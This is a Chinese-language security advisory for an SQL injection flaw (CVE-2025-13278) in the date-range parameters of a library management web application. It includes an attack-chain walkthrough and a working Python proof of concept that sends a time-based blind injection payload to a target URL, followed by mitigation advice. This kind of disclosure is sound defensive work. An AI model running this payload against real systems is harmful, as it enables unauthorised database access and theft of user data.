CVE-2025-13278: Advanced Library Management System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13278

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

projectworlds Advanced Library Management System 1.0

漏洞概述

CVE-2025-13278是projectworlds公司开发的Advanced Library Management System 1.0版本中存在的一个中等严重性安全漏洞。该漏洞位于borrowed_book_search.php文件中，攻击者可以通过操纵datefrom和dateto参数注入恶意SQL代码。由于该漏洞可远程利用，且不需要用户交互，具有低权限的攻击者即可成功实施攻击。CVSS 3.1基础评分为6.3（中等），主要影响系统的机密性、完整性和可用性，均为低程度影响。该漏洞已公开披露，相关信息和利用代码已在互联网广泛传播，建议受影响用户尽快采取修复措施。

技术细节

该SQL注入漏洞存在于Advanced Library Management System 1.0的borrowed_book_search.php文件中的日期范围查询功能。攻击者可以通过在datefrom和dateto参数中注入SQL语句来操纵数据库查询。由于应用程序未对用户输入进行充分的参数化查询或输入验证，恶意SQL代码会被数据库服务器执行。攻击者可以利用此漏洞读取数据库中的敏感信息（如用户数据、图书信息、借阅记录等），修改或删除数据库内容，甚至在某些配置下执行系统命令。漏洞的利用不需要高权限账号，普通注册用户或低权限账号即可发起攻击，且无需用户交互，自动化攻击工具可以大规模利用此漏洞。

攻击链分析

STEP 1

步骤1

攻击者识别目标：发现使用Advanced Library Management System 1.0的图书馆管理系统

STEP 2

步骤2

访问漏洞页面：访问borrowed_book_search.php搜索功能页面

STEP 3

步骤3

构造恶意Payload：在datefrom或dateto参数中注入SQL注入载荷

STEP 4

步骤4

发送攻击请求：向服务器发送包含恶意SQL代码的HTTP POST请求

STEP 5

步骤5

数据库操作：恶意SQL代码被数据库执行，导致数据泄露或未授权操作

STEP 6

步骤6

数据窃取/破坏：攻击者获取敏感数据、修改记录或完全控制数据库

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13278 PoC - SQL Injection in Advanced Library Management System 1.0
# Target: /borrowed_book_search.php
# Parameters: datefrom, dateto

def exploit_sqli(target_url):
    """
    SQL Injection PoC for CVE-2025-13278
    This PoC demonstrates time-based blind SQL injection
    """
    # Vulnerable endpoint
    endpoint = f"{target_url}/borrowed_book_search.php"
    
    # Payload for time-based blind SQL injection (MySQL)
    # This payload causes a 5-second delay if vulnerable
    payload = {
        'datefrom': "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1",
        'dateto': "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
    }
    
    try:
        print(f"[*] Sending payload to {endpoint}")
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        return response.text
    except requests.Timeout:
        print("[!] Request timed out - target is likely vulnerable!")
        return None
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_sqli(target)
    else:
        print("Usage: python cve-2025-13278.py <target_url>")

影响范围

Advanced Library Management System 1.0

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 临时禁用borrowed_book_search.php功能；2) 使用Web应用防火墙规则阻止可疑的SQL注入特征；3) 对相关数据库账户实施严格访问控制；4) 启用数据库查询审计日志；5) 实施IP白名单或速率限制减少暴露面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13278
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13278
3 Details https://www.cvedetails.com/cve/CVE-2025-13278/
4 VulDB https://vuldb.com/cve/CVE-2025-13278
5 Link https://github.com/CH0ico/CVE_choco_1/blob/master/report.md
6 Link https://vuldb.com/?ctiid.332613
7 Link https://vuldb.com/?id.332613
8 Link https://vuldb.com/?submit.690797